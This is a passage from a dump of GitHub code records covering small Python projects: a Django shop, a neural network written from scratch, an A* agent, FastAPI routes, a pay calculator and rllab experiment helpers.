order.get_cart_total:\n\t\torder.complete = True\n\torder.save()\n\n\tif order.shipping == True:\n\t\tShippingAddress.objects.create(\n\t\tcustomer=customer,\n\t\torder=order,\n\t\taddress=data['shipping']['address'],\n\t\tcity=data['shipping']['city'],\n\t\tstate=data['shipping']['state'],\n\t\tzipcode=data['shipping']['zipcode'],\n\t\t)\n\n\treturn JsonResponse('Payment submitted..', safe=False)\n","repo_name":"Pritam-deb/Pizzaria","sub_path":"main_page/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15140980522","text":"import torch\nimport numpy as np\nfrom torchvision import transforms as T\n\n\nclass Antispoof:\n def __init__(self, model):\n self.model = model\n self.model.eval()\n\n def model_predict(self, frame):\n transform = T.Compose(\n [T.ToTensor(), T.Resize(size=(224, 224)), T.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))]\n )\n frame = transform(frame)\n with torch.no_grad():\n logits = self.model(frame.unsqueeze(0))\n return torch.argmax(logits, dim=1).cpu().numpy(), np.array(logits)\n","repo_name":"MkSerdyuk/Face-Anti-Spoofing","sub_path":"face_antispoofing/antispoofing/antispoof.py","file_name":"antispoof.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"13328676414","text":"\"\"\"\r\nbabyNN_model\r\n~~~~~~~~~~~~~\r\nMy first Neural Network\r\nFrom scratch, no ML libraries\r\nwith lots and lots of help\r\nAntony Sikorski\r\n\"\"\"\r\n\r\n# Libraries\r\nimport numpy as np \r\nimport random\r\n\r\n\r\n\r\n# Sigmoid nonlinearity function\r\n# may add other nonlinearities, but for now using only sigmoid is fine\r\ndef sigmoid(z):\r\n a = 1.0 / (1 + np.exp(-z))\r\n return a\r\n\r\n# Need the derivative of sigmoid for backpropogation \r\ndef sigmoidPrime(z):\r\n aPrime = sigmoid(z)*(1 - sigmoid(z))\r\n return aPrime\r\n\r\n\r\n\r\nclass Network:\r\n\r\n def __init__(self, layerSizes, learnRate, miniBatchSize, numEpochs): \r\n\r\n \"\"\"\r\n Constructor for the Network class\r\n\r\n - layerSizes takes a list of layer sizes (input, hiddens, output) (int list)\r\n - learnRate is the learning rate (float)\r\n - miniBatchSize is the size of the mini batches when chopping up the data for \r\n stochastic gradient descent (int)\r\n - numEpochs is the number of training epochs (int)\r\n\r\n Also randomly generates the weights and biases by sampling from a normal \r\n (Gaussian) distribution with a mean 0 and variance 1. \r\n \"\"\"\r\n\r\n self.layerSizes = layerSizes\r\n self.numLayers = len(layerSizes)\r\n self.learnRate = learnRate\r\n self.miniBatchSize = miniBatchSize \r\n self.numEpochs = numEpochs\r\n # generates an array filled with column vectors of biases for \r\n # each layer following the input layer (based on number of neurons)\r\n self.biases = [np.random.randn(i, 1) for i in layerSizes[1:]]\r\n # generates an array filled with matrices of weights based on \r\n # the sizes of each layer (number of neurons)\r\n self.weights = [np.random.randn(j,i) for i,j in zip(layerSizes[:-1], layerSizes[1:])]\r\n\r\n \r\n \r\n def forward(self, a):\r\n \"\"\"\r\n The forward pass function. \r\n Takes the image input vector and returns the NN output vector based on \r\n the current weights and biases \r\n \"\"\"\r\n for b, w in zip(self.biases, self.weights):\r\n a = sigmoid(np.dot(w, a)+b)\r\n return a\r\n\r\n\r\n \r\n def forwardStore(self, a):\r\n \"\"\"\r\n Similar to the forward pass function except it stores each layer's activations\r\n and z vectors. To be used in backpropogation. \r\n Takes the image input vector and returns the lists of all z vectors and \r\n activations (including input, hidden, and output)\r\n \"\"\"\r\n activations = [a] \r\n zList = [] \r\n for b, w in zip(self.biases, self.weights):\r\n z = np.dot(w,a) + b\r\n zList.append(z)\r\n a = sigmoid(z) \r\n activations.append(a) \r\n\r\n return (zList, activations)\r\n\r\n\r\n\r\n # not yet being used, currently okay with just displaying accuracy \r\n def cost(self, output, correct, datLength):\r\n \"\"\"\r\n Calculates the cost/loss. Used for evaluating performance. Takes in the \r\n output of the NN, the desired output, and the length of the data. \r\n Returns a floating point value for the loss/cost. \r\n \"\"\"\r\n step1 = (output - correct)\r\n step2 = np.square(step1)\r\n loss = 0.5 * np.sum(step2)/(datLength)\r\n return loss\r\n\r\n\r\n\r\n def costPrime(self, output, correct):\r\n \"\"\"\r\n Derivative of the cost function. Takes in the output of the NN\r\n and the desired output. Returns the difference vector. Used \r\n in backpropogation. \r\n \"\"\"\r\n return(output-correct)\r\n \r\n\r\n\r\n def backward(self, imageInput, correct):\r\n \"\"\"\r\n The backpropogation function. Most important bit in this whole file. Takes in the \r\n actual image input vector (784x1) and the desired output vector (10x1), and \r\n calculates the gradient in order to updates the weights and biases for one step. \r\n Returns two lists: A list of matrices for the weight gradient, and a list of vectors\r\n for the bias gradient. \r\n\r\n Note: the * operation between two vectors below represents the Hadamard product, \r\n which is just elementwise multiplication of two vectors of the same shape. It\r\n results in a vector of the same shape as the original two. \r\n \"\"\"\r\n\r\n # initializes empty arrays of the same shapes so that we can conveniently put the gradient in \r\n weightGradient = [np.zeros(w.shape) for w in self.weights]\r\n biasGradient = [np.zeros(b.shape) for b in self.biases]\r\n\r\n # Forward pass\r\n # saved lists of z vectors and activations for each layer\r\n zList, activations = self.forwardStore(imageInput)\r\n\r\n\r\n # Backward pass\r\n # all updates will need this constant\r\n constant = self.costPrime(activations[-1], correct) * sigmoidPrime(zList[-1])\r\n\r\n for i in range(1, self.numLayers):\r\n\r\n # for i = 1, initializes the partial deriv equations\r\n if i == 1:\r\n biasGradient[-i] = constant\r\n weightGradient[-i] = np.dot(constant, activations[-i-1].transpose())\r\n \r\n # for i > 1, you effectively just keep multiplying them by the weight of the layer after and\r\n # the sigmoid of the current z\r\n else:\r\n constant = np.dot(self.weights[-i+1].transpose(), constant) * sigmoidPrime(zList[-i])\r\n biasGradient[-i] = constant\r\n weightGradient[-i] = np.dot(constant, activations[-i-1].transpose())\r\n\r\n return (weightGradient, biasGradient)\r\n\r\n\r\n\r\n def train(self,training_data, test_data = None):\r\n \"\"\"\r\n Here we train our NN using stochastic gradient descent with mini batches. We iterate over \r\n multiple epochs (complete training cycles). \r\n\r\n In each epoch, we cut the data up into mini batches, compute the gradient using \r\n backpropogation for each entry in the mini batch, and then calculate the average per\r\n mini batch and use that and the learning rate to update our weights and biases. \r\n We repeat this until we have gone through all of the mini batches, and that is considered \r\n a completed epoch. \r\n\r\n The functions takes in the training_data and testing_data. It first trains the network on \r\n the training_data in each epoch as described above, and then applies that set of weights and\r\n biases to the testing data. The epoch, along with the accuracy/success rate of the network \r\n on the corresponding testing data is so that progress can be tracked. \r\n\r\n The test_data parameter is set to None by default, so that we have the option of training \r\n the network and not doing any testing. If test data is provided, accuracy will be shown. \r\n \"\"\"\r\n training_data = list(training_data)\r\n\r\n #represents one whole cycle of training and testing\r\n for i in range(self.numEpochs):\r\n \r\n #randomly shuffled so that we get different mini-batches in each iteration\r\n random.shuffle(training_data)\r\n #cut into mini batches using list comprehension\r\n miniBatches = [training_data[ind: ind + self.miniBatchSize] for ind in range(0, len(training_data), self.miniBatchSize)]\r\n\r\n #iterating over each mini batch \r\n for miniBatch in miniBatches: \r\n \r\n #lists to keep a running total of the gradient\r\n weightTotalGrad = [np.zeros(w.shape) for w in self.weights]\r\n biasTotalGrad = [np.zeros(b.shape) for b in self.biases]\r\n\r\n #iterating over each image/classification tuple in the mini batch\r\n for x,y in miniBatch:\r\n\r\n #backpropogation \r\n weightGradUpdate, biasGradUpdate = self.backward(x,y)\r\n\r\n #update the running total\r\n weightTotalGrad = [total + update for total, update in zip(weightTotalGrad, weightGradUpdate)]\r\n biasTotalGrad = [total + update for total, update in zip(biasTotalGrad, biasGradUpdate)]\r\n \r\n # the average gradient is computed, then multiplied by the learning rate\r\n # this is then used to update our weights and biases \r\n self.weights = [weights - (self.learnRate/len(miniBatch)) * update for weights, update in zip(self.weights, weightTotalGrad)]\r\n self.biases = [bias - (self.learnRate/len(miniBatch)) * update for bias, update in zip(self.biases, biasTotalGrad)]\r\n\r\n if test_data: \r\n test_data = list(test_data)\r\n\r\n # epoch and accuracy of the network is printed each time if testing data is provided \r\n print(\"Epoch \", i + 1, \" complete\")\r\n results = [(np.argmax(self.forward(x)), y) for (x, y) in test_data]\r\n numCorrect = sum(int(classified == actual) for classified, actual in results)\r\n print(\"Accuracy: \", numCorrect, \"/\", len(test_data), \"\\n\")\r\n\r\n\r\n #In the future maybe also print the loss number to show that it is decreasing\r\n \r\n \r\n #shows which epoch we are on if no test data is provided \r\n else: \r\n print(\"Epoch \", i + 1, \" complete\")\r\n\r\n\r\n\r\n # not yet being used, currently okay with just displaying accuracy \r\n def cost(self, output, correct, datLength):\r\n \"\"\"\r\n Calculates the cost/loss. Used for evaluating performance. Takes in the \r\n output of the NN, the desired output, and the length of the data. \r\n Returns a floating point value for the loss/cost. \r\n \"\"\"\r\n step1 = (output - correct)\r\n step2 = np.square(step1)\r\n loss = 0.5 * np.sum(step2)/(datLength)\r\n return loss","repo_name":"antonyxsik/NeuralNetFromScratch","sub_path":"model_NN.py","file_name":"model_NN.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"74137970978","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 15 01:33:34 2022\n\n@author: dekom\n\"\"\"\nfrom include.astarastar import aStarSearch\nimport time\n\nclass astaragent(object): \n \n def __init__(self, agentNumber, position, target, maxDepth, reservedMap):\n #definition: initial the agent\n #Parameters: tree: search tree #position: the agent's current position #target: the agent's goal position \n #eDistance: the alpha in the determing function, decide the resolution #plotb: if plot the path\n #Returns: None\n self.agentNumber = agentNumber\n self.maxDepth = maxDepth\n self.position = position #current position of agent in (x, y)\n self.target = target #current target position in (x, y)\n self.bestPath = False #false means need to search, True means searching, \n self.reservedMap = reservedMap\n self.history = []\n self.arrive = False\n self.searchtime = 0\n \n def searchAndPlot(self):\n #definition: find the required nodes.\n #save the results of the search\n time_start = time.time()\n #print('searching the best path...')\n if self.bestPath != False:\n return self\n self.arrive = self.ifArrive()\n if self.arrive == False:\n actionList, path, nodeList, count, explored = aStarSearch(self.position, self.target, self.reservedMap, self.maxDepth)\n if path == False:\n self.setBestPath(path)\n return False\n self.setBestPath(path)\n #reserve\n for n in path:\n self.reservedMap[n] = self.agentNumber\n time_end = time.time()\n self.searchtime += time_end - time_start\n #self.plotTree()\n return self\n \n def move(self):\n #definition: move the agent to the new position\n #Parameters: step: how many steps the agent will go along the path\n #Returns: None\n self.arrive = self.ifArrive()\n if self.arrive == False:\n #check path movable\n moveable = True\n for n in self.bestPath:\n if self.reservedMap[n] == 100 or self.reservedMap[n] == 101:\n moveable = False\n if moveable and self.reservedMap[self.bestPath[0]] == self.agentNumber:\n self.reservedMap[self.position] = 0\n self.position = self.bestPath.pop(0)\n self.history.append(self.position)\n print(\"agent\", self.agentNumber, \" has arrived \",self.position )\n else:\n #cancel previous resercation\n for n in self.bestPath:\n if self.reservedMap[n] == self.agentNumber:\n self.reservedMap[n] = 0\n self.bestPath = False\n print(\"agent\", self.agentNumber, \" is blocked, redo search \")\n \n\n else:\n print(\"agent\", self.agentNumber, \" has arrived\")\n \n def ifArrive(self):\n if self.position[0] == self.target[0] and self.position[1] == self.target[1]:\n return True\n else:\n return False\n \n def setBestPath(self, bestPath):\n #set the best path\n self.bestPath = bestPath\n \n","repo_name":"Xiaoshan-jun/QuadtreeForAerospaceAgentSearch","sub_path":"include/astaragent.py","file_name":"astaragent.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32260732195","text":"# Author: Mathurin Massias \n# License: BSD 3 clause\n\nimport os\nimport matplotlib\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nC_LIST = sns.color_palette(\"colorblind\", 8)\nC_LIST_DARK = sns.color_palette(\"dark\", 8)\n\n\ndef configure_plt(fontsize=10, poster=True):\n rc('font', **{'family': 'sans-serif',\n 'sans-serif': ['Computer Modern Roman']})\n usetex = matplotlib.checkdep_usetex(True)\n params = {'axes.labelsize': fontsize,\n 'font.size': fontsize,\n 'legend.fontsize': fontsize,\n 'xtick.labelsize': fontsize - 2,\n 'ytick.labelsize': fontsize - 2,\n 'text.usetex': usetex,\n 'figure.figsize': (8, 6)}\n plt.rcParams.update(params)\n\n sns.set_palette('colorblind')\n sns.set_style(\"ticks\")\n if poster:\n sns.set_context(\"poster\")\n\n\ndef _plot_legend_apart(ax, figname, ncol=None):\n \"\"\"Do all your plots with fig, ax = plt.subplots(),\n don't call plt.legend() at the end but this instead\"\"\"\n if ncol is None:\n ncol = len(ax.lines)\n fig = plt.figure(figsize=(30, 4), constrained_layout=True)\n fig.legend(ax.lines, [line.get_label() for line in ax.lines], ncol=ncol,\n loc=\"upper center\")\n fig.tight_layout()\n fig.savefig(figname, bbox_inches=\"tight\")\n os.system(\"pdfcrop %s %s\" % (figname, figname))\n return fig\n\n\ndict_algo_name = {}\ndict_algo_name[\"pgd\", False] = \"GD\"\ndict_algo_name[\"cd\", False] = \"CD\"\ndict_algo_name[\"bcd\", False] = \"BCD\"\ndict_algo_name[\"pgd\", True] = \"GD - Anderson\"\ndict_algo_name[\"cd\", True] = \"CD - Anderson\"\ndict_algo_name[\"bcd\", True] = \"BCD - Anderson\"\ndict_algo_name[\"rcd\", False] = \"RCD\"\ndict_algo_name[\"rbcd\", False] = \"RBCD\"\ndict_algo_name[\"fista\", False] = \"GD - inertial\"\ndict_algo_name[\"apcg\", False] = \"CD - inertial\"\n\n\ncurrent_palette = sns.color_palette(\"colorblind\")\ndict_color = {}\ndict_color[\"pgd\"] = current_palette[0]\ndict_color[\"fista\"] = current_palette[0]\ndict_color[\"cd\"] = current_palette[1]\ndict_color[\"bcd\"] = current_palette[1]\ndict_color[\"rcd\"] = current_palette[4]\ndict_color[\"rbcd\"] = current_palette[4]\ndict_color[\"apcg\"] = current_palette[1]\n","repo_name":"mathurinm/andersoncd","sub_path":"andersoncd/plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"2189550504","text":"from dotenv import load_dotenv\nload_dotenv()\nimport os\nfrom dependency_injector import containers, providers\n\nfrom .database import Database\nfrom .repositories import UserRepository, SupportOptionRepository\nfrom .services import UserService, SupportOptionService\n\n\nclass Container(containers.DeclarativeContainer):\n\n wiring_config = containers.WiringConfiguration(modules=[\".endpoints\"])\n\n db = providers.Singleton(Database, db_url=os.getenv('DATABASE_CONNECTION_STRING'))\n\n user_repository = providers.Factory(\n UserRepository,\n session_factory=db.provided.session\n )\n\n support_option_repository = providers.Factory(\n SupportOptionRepository,\n session_factory=db.provided.session\n )\n\n user_service = providers.Factory(\n UserService,\n user_repository=user_repository,\n )\n\n support_option_service = providers.Factory(\n SupportOptionService,\n user_repository=user_repository,\n support_option_repository=support_option_repository\n )","repo_name":"scdest/FastApiPatreon","sub_path":"app/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38165637402","text":"import sys\nimport logging\n\n# Rates to be applied to employees payment calculator\nrates = {\n 'MO': [\n # Rate for hour range\n # (from, to, rate)\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'TU': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'WE': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'TH': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'FR': [\n (0, 9, 25),\n (9, 18, 15),\n (18, 24, 20),\n ],\n 'SA': [\n (0, 9, 30),\n (9, 18, 20),\n (18, 24, 25),\n ],\n 'SU': [\n (0, 9, 30),\n (9, 18, 20),\n (18, 24, 25),\n ],\n}\n\n\nclass RateNotDefined(Exception):\n \"\"\"Exception to be called when the rate is not defined for a range\"\"\"\n \n def __init__(self, day, hour) -> None:\n super().__init__(f\"No rate is defined for day: '{day}' and hour: '{hour}-{hour+1}'\")\n\n\ndef get_rate(day: str, hour: int) -> int:\n \"\"\"Get the rate corresponding to certain hour in a day.\n\n Args:\n day (str): Day of the week, in a 2 letters format. [MO-SU]\n hour (int): Hour of the day to evaluate\n\n Raises:\n RateNotDefined: If the hour-rate table does not include the rate for the \n specified day-hour, this error will be raised\n\n Returns:\n int: Rate for this specific day-hour combination to be paid.\n \"\"\"\n for range_start, range_end, rate in rates[day.upper()]:\n if hour in range(range_start, range_end):\n return rate\n raise RateNotDefined(day, hour)\n\n\ndef rate_calculator(employee_data: str) -> str:\n \"\"\"Function to calculate the total amount to be paid an employee \n based on the hours they worked and the times during which they worked.\n\n Args:\n employee_data (str): input text to be processed.\n Example 1: RENE=MO10:00-12:00,TU10:00-12:00,TH01:00-03:00,SA14:00-18:00,SU20:00-21:00 \n Example 2: ASTRID=MO10:00-12:00,TH12:00-14:00,SU20:00-21:00\n\n Returns:\n str: Total amount to be paid to the employee in the format: The amount to pay {EMPLOYEE} is: {AMOUNT} USD\n \"\"\"\n pay_to = employee_data.split('=')[0]\n worked_hours = employee_data.split('=')[1]\n to_be_paid = 0\n for day_worked in worked_hours.split(','):\n day = day_worked[0:2]\n to_be_paid_for_this_day = 0\n for hour_worked in range(int(day_worked[2:4]), int(day_worked[8:10])):\n to_be_paid_for_this_day += get_rate(day, hour_worked)\n to_be_paid += to_be_paid_for_this_day\n return f'The amount to pay {pay_to} is: {to_be_paid} USD'\n\n\ndef process_file(txt_filename: str) -> None:\n \"\"\"Process a .txt file to extract and calculate the exact amount to be paid\n to every employee in the file based on their worked hours\n\n Args:\n txt_filename (str): Filename of the desired .txt file to be processed\n \"\"\"\n try:\n with open(txt_filename, 'r') as content:\n for line in content:\n print(rate_calculator(line))\n except FileNotFoundError:\n logging.error(f'File: {txt_filename} not found')\n\nif __name__ == '__main__':\n # Check if filename is passed from command line as a positional argument.\n if len(sys.argv) > 1:\n process_file(sys.argv[1])\n exit()\n\n # If the filename is not in the arguments, ask for it\n print('Please input the .txt filename')\n print('txt file should be in the same folder of this script.')\n txt_filename = input(\"filename: \")\n process_file(txt_filename)\n","repo_name":"cesar128/Payment_calculator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"73652257696","text":"from django.urls import path\nfrom accounts import views as accounts_views\nfrom django.contrib.auth import views as auth_views\n\n# For Navbar Rendering\nfrom shop.models import Category_A, Category_B\ncategories_A = Category_A.objects.all() \ncategories_B = Category_B.objects.all()\ncontext = {\n 'categories_A': categories_A,\n 'categories_B': categories_B,\n }\n\nurlpatterns = [\n path('', accounts_views.profile, name='profile'),\n path('sign_up/', accounts_views.sign_up, name='sign_up'),\n path('login/',auth_views.LoginView.as_view(extra_context=context),name='login'),\n path('logout/',auth_views.LogoutView.as_view(extra_context=context),name='logout'),\n \n]\n\n# Custom LoginView : as_view(extra_context{\"tag\":Var}) :https://stackoverflow.com/questions/55107971/custom-loginview-django-extra-context","repo_name":"jeyu54217/django_ecommerce","sub_path":"Demo/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72868574816","text":"class Table(object):\n def config_db(self,pkg):\n tbl=pkg.table('faldone', pkey='id', name_long='Faldone', \n name_plural='Faldoni',caption_field='numero', partition_agency_id='agency_id')\n self.sysFields(tbl,counter=True)\n tbl.column('numero', name_short='!![en]Number')\n tbl.column('agency_id',size='22', name_long='agency_id'\n ).relation('agency.id', relation_name='faldone_agency_id', mode='foreignkey', onDelete='raise')\n tbl.column('dal', dtype='D', name_long='!![en]Date from')\n tbl.column('al', dtype='D', name_long='!![en]Date to')\n def defaultValues(self):\n return dict(agency_id=self.db.currentEnv.get('current_agency_id'))\n\n ","repo_name":"codicem69/shipsteps","sub_path":"packages/shipsteps/model/faldone.py","file_name":"faldone.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28934654925","text":"'''\nCreated on 01/04/2014\n\n@author: jacekrad\n'''\nfrom __future__ import print_function\nfrom sequence import *\n\nblosum62_matrix = readSubstMatrix(\"../blosum62.matrix\", Protein_Alphabet)\n\np450_aln = readClustalFile(\"../p450.aln\", Protein_Alphabet)\np450_matrix = p450_aln.calcSubstMatrix()\np450_matrix.writeFile(\"p450.matrix\")\n\n\nrhodopsin_aln = readClustalFile(\"../rhodopsin.aln\", Protein_Alphabet)\nrhodopsin_matrix = rhodopsin_aln.calcSubstMatrix()\nrhodopsin_matrix.writeFile(\"rhodopsin.matrix\")\n\nprint (\"=================================== BLOSUM62 =======================================\", file=sys.stderr)\nprint (blosum62_matrix, file=sys.stderr)\nprint (\"===================================== P450 =========================================\", file=sys.stderr)\nprint (p450_matrix, file=sys.stderr)\nprint (\"================================== RHODOPSIN =======================================\", file=sys.stderr)\nprint (rhodopsin_matrix, file=sys.stderr)\n\n# deltas in the score matrices between blosum62 and out p450 & rhodopsin\np450_deltas = {}\nrhodopsin_deltas = {}\n\n# for each residue pair calculate the delta between blosum62 and our scores\nfor key_pair in blosum62_matrix.scoremat:\n p450_deltas[key_pair] = p450_matrix.scoremat[key_pair] - blosum62_matrix.scoremat[key_pair]\n rhodopsin_deltas[key_pair] = rhodopsin_matrix.scoremat[key_pair] - blosum62_matrix.scoremat[key_pair]\n\n#for key_pair in p450_deltas:\n# print(p450_deltas[key_pair], \",\", key_pair, file=sys.stdout)\n \nfor key_pair in rhodopsin_deltas:\n print(rhodopsin_deltas[key_pair], \",\", key_pair, file=sys.stdout)\n","repo_name":"jacekrad/scie2100","sub_path":"prac02/practwo/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"41616455350","text":"# Python3 program to find the smallest window\n# containing all characters of a pattern.\nno_of_chars = 256\n\n# Function to find smallest window containing all characters of 'pat'\ndef findSubString(string, pat):\n hash_pat = [0] * no_of_chars\n hash_str = [0] * no_of_chars\n for i in pat:\n hash_pat[ord(i)] += 1\n\n start = 0\n count = 0\n end = len(string) - 1\n minlenth = 1000\n res = \"\"\n\n for j in range(0, len(string)):\n # print(string[j])\n hash_pat[ord(string[j])] -= 1\n if hash_pat[ord(string[j])] >= 0:\n # print(\"found\",string[j])\n count += 1\n while count == len(pat):\n print(\"first take\", start)\n if minlenth > j - start + 1:\n minlenth = j - start + 1\n res = string[start:j + 1]\n print(\"Result:\", res)\n hash_pat[ord(string[start])] += 1\n if hash_pat[ord(string[start])] > 0:\n print(\"here\")\n count -= 1\n start += 1\n\n return res\n\n\n# Driver code\nif __name__ == \"__main__\":\n string = \"cccaaaabweeefgewcwaefgcf\"\n pat = \"cae\"\n\n print(\"Smallest window is : \")\n print(findSubString(string, pat))\n","repo_name":"lamakmudgal/Practice","sub_path":"ArraysStrings/smallestsubtring.py","file_name":"smallestsubtring.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12811365202","text":"from src.Database.CourseMapper import CourseMapper\nimport pytest\nfrom unittest.mock import Mock\n\n\ndef test_load():\n\n cm = CourseMapper.getInstance()\n course_id = \"241\"\n department = \"POTS\"\n cm.__load_lab = Mock()\n rv = cm.load(course_id=course_id, department=department)\n cm.__load_lab.assert_not_called()\n assert rv.__class__.__name__ == 'Course'\n","repo_name":"noahpselman/oop","sub_path":"src/tests/Database/test_CourseMapper.py","file_name":"test_CourseMapper.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70081715297","text":"from fastapi import APIRouter, Request as RequestFastApi\nfrom fastapi.responses import JSONResponse\n\nfrom src.main.adapters import request_adapter\n\nfrom src.validators import get_starships_validator\nfrom src.validators import get_starship_information_validator\n\nfrom src.main.composers import get_starship_information_composer\nfrom src.main.composers import get_starships_in_paginagion\n\nfrom src.presenters.errors import handle_error\n\nstarships_routes: APIRouter = APIRouter()\n\n\n@starships_routes.get(\"/api/starships/list\")\nasync def get_starships_in_page(request: RequestFastApi):\n \"\"\"\n List of starships\n :param request:\n :return:\n \"\"\"\n\n response = None\n controller = get_starships_in_paginagion()\n\n try:\n await get_starships_validator(request)\n response = await request_adapter(request, controller.handler)\n except Exception as error:\n response = handle_error(error)\n\n return JSONResponse(status_code=response[\"status_code\"], content=response[\"data\"])\n\n\n@starships_routes.post(\"/api/starship/information\")\nasync def get_starship_information(request: RequestFastApi):\n \"\"\"get_starship_information _summary_\n\n _extended_summary_\n\n Parameters\n ----------\n request : RequestFastApi\n _description_\n\n Returns\n -------\n _type_\n _description_\n \"\"\"\n\n response = None\n controller = get_starship_information_composer()\n\n try:\n await get_starship_information_validator(request)\n response = await request_adapter(request, controller.handler)\n except Exception as error:\n response = handle_error(error)\n\n return JSONResponse(status_code=response[\"status_code\"], content=response[\"data\"])\n","repo_name":"FilipeNMarques/learning-requests-python","sub_path":"src/main/routes/starships_routes.py","file_name":"starships_routes.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23466923264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nA cross platform interface to libmagic.\n\"\"\"\ntry:\n from winmagic import magic\nexcept ModuleNotFoundError:\n import os\n if os.name == 'nt':\n # Attempting to import magic on Windows without winmagic being\n # installed may result in an uncontrolled crash.\n magic = None\n else:\n try:\n import magic\n except ImportError:\n magic = None\n\n\ndef magicparse(data, *args, **kwargs):\n if magic:\n data = bytes(data) if not isinstance(data, bytes) else data\n return magic.Magic(*args, **kwargs).from_buffer(data)\n","repo_name":"binref/refinery","sub_path":"refinery/lib/magic.py","file_name":"magic.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"34"} +{"seq_id":"27934077096","text":"from rllab.misc.instrument import stub\nimport tensorflow as tf\n\nfrom sandbox.rocky.tf.algos.trpo import TRPO\nfrom sandbox.rocky.tf.algos.ddpg import DDPG\nfrom sandbox.rocky.tf.algos.vpg import VPG\n\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom sandbox.rocky.tf.baselines.q_baseline import QfunctionBaseline\n\nfrom rllab.envs.gym_env import GymEnv\nfrom rllab.envs.normalized_env import normalize\nfrom sandbox.rocky.tf.envs.base import TfEnv\n\nfrom sandbox.rocky.tf.exploration_strategies.ou_strategy import OUStrategy\n\nfrom sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy\nfrom sandbox.rocky.tf.policies.deterministic_mlp_policy import DeterministicMLPPolicy\n\nfrom sandbox.rocky.tf.q_functions.continuous_mlp_q_function import ContinuousMLPQFunction\n\ndef get_env(env_name, record_video=True, record_log=True, normalize_obs=False, **kwargs):\n env = TfEnv(normalize(GymEnv(env_name, record_video=record_video,\n record_log=record_log), normalize_obs=normalize_obs))\n return env\n\ndef get_policy(env, algo_name, **kwargs):\n policy = None\n if algo_name in ['trpo', 'qprop', 'vpg', 'qvpg']:\n policy = GaussianMLPPolicy(\n name=\"policy\",\n env_spec=env.spec,\n # hidden_sizes=(hid_size, hid_size)\n hidden_sizes=(100, 50, 25),\n hidden_nonlinearity=tf.nn.tanh,\n )\n elif algo_name in ['ddpg']:\n policy = DeterministicMLPPolicy(\n name=\"policy\",\n env_spec=env.spec,\n #hidden_sizes=(hid_size, hid_size),\n hidden_sizes=(100, 50, 25),\n #hidden_sizes=(100,100),\n hidden_nonlinearity=tf.nn.relu,\n )\n return policy\n\ndef get_qf(env, algo_name, qf_hid_size, qf_hidden_nonlinearity, **kwargs):\n qf = None\n if algo_name in ['ddpg', 'qprop', 'qvpg']:\n if qf_hidden_nonlinearity == 'relu':\n hidden_nonlinearity = tf.nn.relu\n elif qf_hidden_nonlinearity == 'tanh':\n hidden_nonlinearity = tf.nn.tanh\n else: raise NotImplementedError(qf_hidden_nonlinearity)\n qf = ContinuousMLPQFunction(\n env_spec=env.spec,\n #hidden_sizes=(100,100),\n hidden_sizes=(qf_hid_size, qf_hid_size),\n hidden_nonlinearity=hidden_nonlinearity,\n )\n return qf\n\ndef get_es(env, algo_name, **kwargs):\n es = None\n if algo_name in ['ddpg']:\n es = OUStrategy(env_spec=env.spec)\n return es\n\ndef get_baseline(env, algo_name, **kwargs):\n baseline = None\n if algo_name in ['trpo', 'qprop', 'vpg', 'qvpg']:\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n return baseline\n\ndef get_algo(env, policy, es, qf, baseline, max_path_length,\n batch_size, replay_pool_size, discount,\n scale_reward, learning_rate, replacement_prob,\n policy_updates_ratio,\n step_size, gae_lambda,\n sample_backups,\n qprop_min_itr,\n qf_updates_ratio,\n qprop_use_qf_baseline,\n qprop_eta_option,\n algo_name,\n qf_learning_rate,\n n_itr,\n **kwargs):\n algo = None\n min_pool_size = 1000\n qf_batch_size = 64\n qf_baseline = None\n\n print('Creating algo=%s with n_itr=%d, 